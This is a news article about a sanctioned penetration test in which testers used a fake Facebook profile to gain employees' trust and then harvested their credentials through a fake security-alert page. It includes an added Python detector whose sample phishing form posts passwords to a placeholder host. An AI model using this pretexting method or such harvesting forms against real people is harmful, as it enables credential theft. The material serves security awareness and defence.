The Tech Herald

Snosoft researchers offer a look at Facebook from a pentesting perspective

by Steve Ragan - Feb 16 2009, 17:23

Snosoft researchers take a look at the shortcomings of corporate social networking.

The Snosoft Research Blog has a great article online that examines what a criminal or pentester would see when looking at social networking, using Facebook as a practical example.

The post centers on the work of Netragard, a company dedicated to a wide range of security auditing, which includes penetration testing, social engineering and computer forensics, and covers just one job where those skills were put to use.

The nature of the Internet, shapeless and, for the most part, anonymous, is one reason why social engineering works so well. The boom in social-networking services only adds to the ease with which criminals and professional pentesters can use social engineering to get the job done.

More often than not, in order to get sensitive information, unrestricted access to a network, or whatever else a criminal (or pentester) wants, all one has to do is ask for it. The trick is to make the request appear legitimate, which requires a little information. However, this, too, is all too easy to get with a little research and some conversation.

The Snosoft post deals with the topic of trust. In the case it references, they were hired by a company to test the overall security of the business. They did two things: first they exploited the trust of the employees at the company by using Facebook, then they tested the security and stability of the infrastructure.

Without quoting the entire blog post, a brief overview is that during the job they created a fake Facebook profile, and then joined the company's Facebook group. With this fake profile, they gathered various bits of information on the company (simple information gathering). Using the information obtained from various members of the company's group, they started small conversations with members using their fake profile.

The conversations, mostly small talk with nothing of serious value, were designed to make the fake profile seem trustworthy. The fake profile chatted about things only an "insider" would know. This is where the information gathering helped: because the fake profile knew things no one on the outside would know, it appeared trustworthy.

With trust duly established, the time was right to spring the trap, which consisted of the same type of payload criminals would use, according to the post:

"...a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users' credentials are entered, the form submitted them to http://www.netragard.com and they were extracted by an automated tool that we created."

The fake profile posted a link titled: “Omigawd have you seen this I think we got hacked.” And, almost instantly, people started clicking on it and filling out information. Ironic as it sounds, one of the first sets of credentials that were sent belonged to the person who hired the pentesting crew.
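The detail that gives the fake alert page away is in the quoted description: it looked like part of the customer's site, but its form sent the credentials to a different host, and over plain http. The following is an added example, not code from the Snosoft or Netragard post, showing the defensive check a security team can run over a page's HTML: flag any form containing a password field whose action points to another host than the page itself, or to a non-https URL. The HTML and the domains (`www.example-customer.test`, `collector.example.test`) are constructed placeholders for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormCollector(HTMLParser):
    """Collect every <form> on a page together with its action attribute
    and whether it contains an <input type="password">."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_suspicious_forms(page_url, html):
    """Return a list of (resolved_action_url, reason) for every credential form
    that posts to a host other than the page's own, or over plain http.
    Forms without a password field are ignored."""
    parser = _FormCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A missing or empty action submits back to the page itself.
        action = urljoin(page_url, form["action"] or page_url)
        target = urlparse(action)
        reasons = []
        if target.hostname != page_host:
            reasons.append("posts credentials to a different host")
        if target.scheme != "https":
            reasons.append("posts credentials over plain http")
        if reasons:
            findings.append((action, "; ".join(reasons)))
    return findings


# Constructed sample: an "account compromised" alert page hosted on the
# company's own domain whose form ships the credentials elsewhere.
PAGE_URL = "https://www.example-customer.test/security/alert"
FAKE_ALERT_HTML = """
<html><body>
<h1>Security alert</h1>
<p>Your account may have been compromised. Please verify your credentials.</p>
<form method="post" action="http://collector.example.test/submit">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Verify">
</form>
</body></html>
"""

# Constructed sample of a benign same-origin login form for comparison.
BENIGN_LOGIN_HTML = """
<form method="post" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
"""

if __name__ == "__main__":
    for url, reason in find_suspicious_forms(PAGE_URL, FAKE_ALERT_HTML):
        print(f"SUSPICIOUS: {url} ({reason})")
    print("benign page findings:", find_suspicious_forms(PAGE_URL, BENIGN_LOGIN_HTML))
```

The check is deliberately narrow: it only looks at where a page sends a password, which is exactly the property the quoted payload relied on users not noticing. It does not prove a page is legitimate, and a lookalike hosted on an attacker-controlled domain would need the page's own URL checked against the expected host as well.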

The full post, with more details, is available on the Snosoft Research Blog.

The point of the post on Snosoft, as well as the lesson to be learned, is that companies and individuals need to learn to be more skeptical. Yet, that is easier said than done, because trust takes time. In the Facebook example, the information is there to start a trust relationship online, and criminals will take whatever time is needed to reach their end goal.

Sometimes it takes a week, other times it can take years. The result is the same: information that you post online can be used against you or your company to some degree.

The blog post is great, and highly recommended reading.
